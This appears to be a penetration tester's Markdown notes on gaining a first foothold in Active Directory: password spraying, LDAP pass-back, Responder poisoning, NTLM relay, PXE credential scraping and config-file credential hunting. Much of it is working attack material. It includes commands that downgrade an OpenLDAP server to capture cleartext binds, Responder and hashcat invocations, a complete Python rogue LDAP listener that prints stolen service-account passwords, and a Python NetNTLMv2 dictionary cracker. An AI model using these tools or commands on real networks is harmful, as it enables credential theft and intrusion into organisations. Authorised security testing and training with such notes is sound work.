killchain-compendium/Miscellaneous/Active Directory/gaining_foothold_AD.md


Active Directory - Gain Foothold

  • Methods of acquiring the first set of credentials

Acquire credentials

OSINT

  • Discover info about the target via

Phishing

  • Gain credentials via e-mail, e.g. a credential-harvesting login page or a malicious attachment

NTLM Authenticated Services

  • NetNTLM is a challenge-response protocol: the service hands the client a challenge, the client answers with a response derived from its password hash, and the service forwards challenge and response -- on the user's behalf -- to the DC, which validates them. The password itself never reaches the service.

  • Such NetNTLM-authenticated services are often exposed to the Internet. For example

    • Mail exchange, OWA webmail
    • RDP
    • VPN endpoints
    • Web applications using something like SSO via AD
  • Use these applications either to brute force or password-spray the usernames found during OSINT, or to verify previously acquired usernames and passwords. Check the domain lockout policy first (threshold and observation window) and keep spraying to one or two passwords per window, since a spray that locks out the user base is both noisy and counterproductive.

LDAP Bind Credentials

  • Every DC exposes LDAP, so applications that are not domain-joined can still authenticate users against AD: the application binds to the DC with its own AD service account (the "bind credentials") and then looks up or verifies the user. Those bind credentials are stored in the application's configuration and are a target in themselves.
  • Third-party programs that commonly use LDAP this way
    • CUPS
    • VPNs
    • GitLab

LDAP Pass-Back

  • After gaining access to a device's configuration that holds LDAP parameters (printers, NAS boxes and similar often expose this through their web UI), change the configured LDAP server address to your own IP. The device will then try to bind to your host with its stored LDAP credentials.
  • Run an LDAP server to catch the credentials. It must offer only the PLAIN and LOGIN SASL mechanisms, so the device has nothing stronger to negotiate and sends the password in the clear.
    • OpenLDAP
dpkg-reconfigure -p low slapd
* Skip reconfiguration -> No
* Insert DNS domain and organisation
* Provide password
* Select `MDB` as database
* No removal when db is purged
* Move old database when creating a new one
* Downgrade authentication via an `*.ldif` file (saved here as `olcSaslSecProps.ldif`)
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
* Patch and reload ldap
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart
* Check via (the output should list PLAIN and LOGIN)
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
  • Capture the bind with tcpdump and read the cleartext password from the pcap, e.g. `sudo tcpdump -SX -i <interface> tcp port 389`
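As an added example (not part of the original notes, and an alternative to the slapd reconfiguration above): a minimal rogue LDAP listener that decodes the simple BindRequest a misconfigured device sends and prints the DN and cleartext password. It handles only simple binds, which is what most printers and appliances use; a device that insists on a SASL mechanism or on TLS needs the slapd approach instead. The sample message, the service-account DN and the password are constructed, not captured.

```python
"""Rogue LDAP listener for an LDAP pass-back: decode a simple BindRequest (BER).

Added example, not from the original notes. Sample data below is constructed.
"""
import socket

LDAP_PORT = 389  # assumption: run as root, or pick a high port and point the device at it


def encode_tlv(tag: int, value: bytes) -> bytes:
    """BER tag-length-value with definite short or long form length."""
    n = len(value)
    if n < 0x80:
        length = bytes([n])
    else:
        raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(raw)]) + raw
    return bytes([tag]) + length + value


def decode_tlv(buf: bytes, pos: int = 0):
    """Return (tag, value, next_pos) for the TLV starting at pos."""
    tag, first, pos = buf[pos], buf[pos + 1], pos + 2
    if first & 0x80:                      # long form: next (first & 0x7F) bytes hold the length
        nbytes = first & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    else:
        length = first
    return tag, buf[pos:pos + length], pos + length


def encode_bind_request(msg_id: int, name: str, password: str) -> bytes:
    """LDAPMessage { messageID, [APPLICATION 0] BindRequest { version 3, name, simple [0] } }."""
    bind = (encode_tlv(0x02, b"\x03")                # version INTEGER 3
            + encode_tlv(0x04, name.encode())       # name LDAPDN
            + encode_tlv(0x80, password.encode()))  # authentication: simple [0] OCTET STRING
    return encode_tlv(0x30, encode_tlv(0x02, bytes([msg_id])) + encode_tlv(0x60, bind))


def parse_bind_request(msg: bytes):
    """Decode a simple BindRequest; return None for anything else (SASL bind, search, ...)."""
    tag, body, _ = decode_tlv(msg)
    if tag != 0x30:
        return None
    tag, msg_id, pos = decode_tlv(body)
    if tag != 0x02:
        return None
    tag, bind, _ = decode_tlv(body, pos)
    if tag != 0x60:                       # not a BindRequest
        return None
    _, version, pos = decode_tlv(bind)
    _, name, pos = decode_tlv(bind, pos)
    tag, auth, _ = decode_tlv(bind, pos)
    if tag != 0x80:                       # 0xA3 would be a SASL bind: no cleartext password there
        return None
    return {"message_id": int.from_bytes(msg_id, "big"),
            "version": int.from_bytes(version, "big"),
            "name": name.decode(errors="replace"),
            "password": auth.decode(errors="replace")}


def bind_response(msg_id: int, result_code: int = 49) -> bytes:
    """BindResponse (49 = invalidCredentials) so the device closes cleanly instead of hanging."""
    resp = encode_tlv(0x0A, bytes([result_code])) + encode_tlv(0x04, b"") + encode_tlv(0x04, b"")
    return encode_tlv(0x30, encode_tlv(0x02, bytes([msg_id])) + encode_tlv(0x61, resp))


def serve(port: int = LDAP_PORT):
    """Accept connections one at a time and print whatever simple bind arrives."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen()
        while True:
            conn, peer = srv.accept()
            with conn:
                data = conn.recv(4096)
                creds = parse_bind_request(data) if data else None
                if creds:
                    print(f"[+] {peer[0]} bound as {creds['name']!r} with password {creds['password']!r}")
                    conn.sendall(bind_response(creds["message_id"]))
                else:
                    print(f"[-] {peer[0]} sent something other than a simple bind")


# Constructed sample: what a printer doing an LDAP address-book lookup would send (names are made up).
SAMPLE = encode_bind_request(1, "CN=svc_printer,OU=Service Accounts,DC=corp,DC=local", "Printer123!")

if __name__ == "__main__":
    print(parse_bind_request(SAMPLE))
    serve()
```

Run it, point the device's LDAP server setting at your host and trigger a test lookup from the device's web UI; the bind shows up on the console in the same form `tcpdump -X` would show it, minus the hex dump.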

Authentication Relay

  • Services inside the network authenticate to each other over NetNTLM, and those challenge-response exchanges can be captured or relayed
  • Capture the NetNTLM responses that clients send, for example during SMB authentication, or sit in the middle and relay them
  • Responder poisons the name-resolution requests it sees on the segment, so victims connect to the attacker instead of the host they were looking for
    • Link-Local Multicast Name Resolution (LLMNR), tried by Windows after DNS fails
    • NetBIOS Name Service (NBT-NS), the last fallback after LLMNR
    • Web Proxy Auto-Discovery (WPAD), used by clients to find a proxy for future HTTP connections; a poisoned WPAD answer makes browsers authenticate to the attacker's proxy

Capture via responder

  • Run responder on the LAN via
sudo responder -I <interface>
  • Use hashcat to crack the captured hashes: mode 5600 for NetNTLMv2 (the usual case), mode 5500 for NetNTLMv1. Only one capture per user is needed, and `--force` merely suppresses device warnings, so drop it unless hashcat refuses to start.
hashcat -m 5600 hash.txt rockyou.txt
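To show what hashcat mode 5600 actually does with a Responder line, here is an added example (not from the original notes) that recomputes a NetNTLMv2 response from a candidate password and compares it with the captured NTProofStr. The hash line is constructed from a made-up challenge, blob, user and password rather than captured from a network; MD4 is implemented inline because `hashlib` has no `md4` on most OpenSSL 3 builds.

```python
"""NetNTLMv2 as hashcat -m 5600 sees it. Added example; sample data is constructed."""
import hashlib
import hmac
import struct


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, pure Python so it works where hashlib has no md4."""
    M = 0xFFFFFFFF
    rotl = lambda x, s: ((x << s) | (x >> (32 - s))) & M
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):                                    # round 1
            a = rotl((a + F(b, c, d) + X[i]) & M, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                    # round 2
            a = rotl((a + G(b, c, d) + X[(i % 4) * 4 + i // 4] + 0x5A827999) & M, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                    # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & M, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(v + w) & M for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is what hashcat -m 1000 cracks."""
    return md4(password.encode("utf-16le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    """HMAC-MD5 keyed with the NT hash over UPPER(user) + domain, both UTF-16LE."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTLMv2 hash, server challenge || client blob)."""
    return hmac.new(ntlmv2_hash(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def parse_hash_line(line: str):
    """user::domain:challenge:NTProofStr:blob, the layout Responder writes and hashcat reads."""
    user, _, domain, challenge, proof, blob = line.strip().split(":")
    return user, domain, bytes.fromhex(challenge), bytes.fromhex(proof), bytes.fromhex(blob)


def crack(line: str, wordlist):
    """Dictionary attack: one NT hash + two HMAC-MD5 per candidate, exactly hashcat's per-word cost."""
    user, domain, challenge, proof, blob = parse_hash_line(line)
    for candidate in wordlist:
        if hmac.compare_digest(nt_proof(candidate, user, domain, challenge, blob), proof):
            return candidate
    return None


def make_hash_line(user, domain, password, server_challenge, blob) -> str:
    """Build a Responder-style line; used here only to construct the sample."""
    proof = nt_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed sample with a fixed challenge and blob so the line is reproducible.
CHALLENGE = bytes.fromhex("1122334455667788")
BLOB = (b"\x01\x01" + b"\x00" * 6                                 # NTLMv2_CLIENT_CHALLENGE header
        + struct.pack("<Q", 133_000_000_000_000_000)           # timestamp (made up)
        + bytes.fromhex("0123456789abcdef")                    # client nonce (made up)
        + b"\x00" * 4
        + b"\x02\x00\x08\x00" + "CORP".encode("utf-16le")      # AV_PAIR MsvAvNbDomainName
        + b"\x00\x00\x00\x00" + b"\x00" * 4)                   # MsvAvEOL + trailer
SAMPLE_LINE = make_hash_line("j.doe", "CORP", "Summer2024!", CHALLENGE, BLOB)
WORDLIST = ["password", "Welcome1", "Summer2024!", "Winter2024!"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack(SAMPLE_LINE, WORDLIST))
```

The two HMAC-MD5 steps are why NetNTLMv2 cracks slower than raw NT hashes but still fast enough for a wordlist attack; note that the username is uppercased but the domain is used as captured, so a line with the wrong domain case will never crack.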

Relay via responder

  • SMB signing must not be required on the target: "disabled" or merely "enabled" (negotiable) both work, "required" defeats the relay. Check with `nmap -p445 --script smb2-security-mode <targets>` before trying.
  • Done after some initial enumeration, once you know which hosts lack signing and which users are local admins there; relaying a privileged user's authentication to such a host yields an administrative foothold.
  • Responder itself only captures. For relaying, use a relay tool such as impacket's ntlmrelayx alongside it, with Responder's SMB and HTTP servers turned off in Responder.conf so the relay tool can bind those ports.

Microsoft Deployment Toolkit (MDT)

  • Automates deployment of Windows images and applications to new or rebuilt machines over the network
  • Used in conjunction with Microsoft's System Center Configuration Manager (SCCM)

Preboot Execution Environment (PXE)


  • Boot and install an OS over the network: the client obtains an IP via DHCP, and the DHCP/PXE options point it at the boot server and boot file

  • MDT provisions the PXE boot images that this server hands out

  • A DHCP lease on the right segment is the only "validation" involved, so anyone on that segment can request the PXE boot material that MDT delivers

  • Retrieve and enumerate the boot configuration (BCD) and boot images via TFTP, which needs no credentials

  • One option is to let the deployment complete and create an admin account on the freshly installed host

  • The other is password scraping: the boot image carries the MDT bootstrap configuration with the credentials used to connect to the deployment share during OS installation, and those are often domain accounts

  • PowerPXE.ps1 automates this: it parses the BCD file fetched over TFTP, downloads the referenced boot image and extracts those credentials from it

Configuration Files

  • Credentials left in configuration files of services and applications, as well as in registry keys (unattended-install answer files, autologon entries, application connection strings)
  • Use enumeration scripts like winPEAS or Seatbelt on Windows hosts (linPEAS on Linux hosts) to find them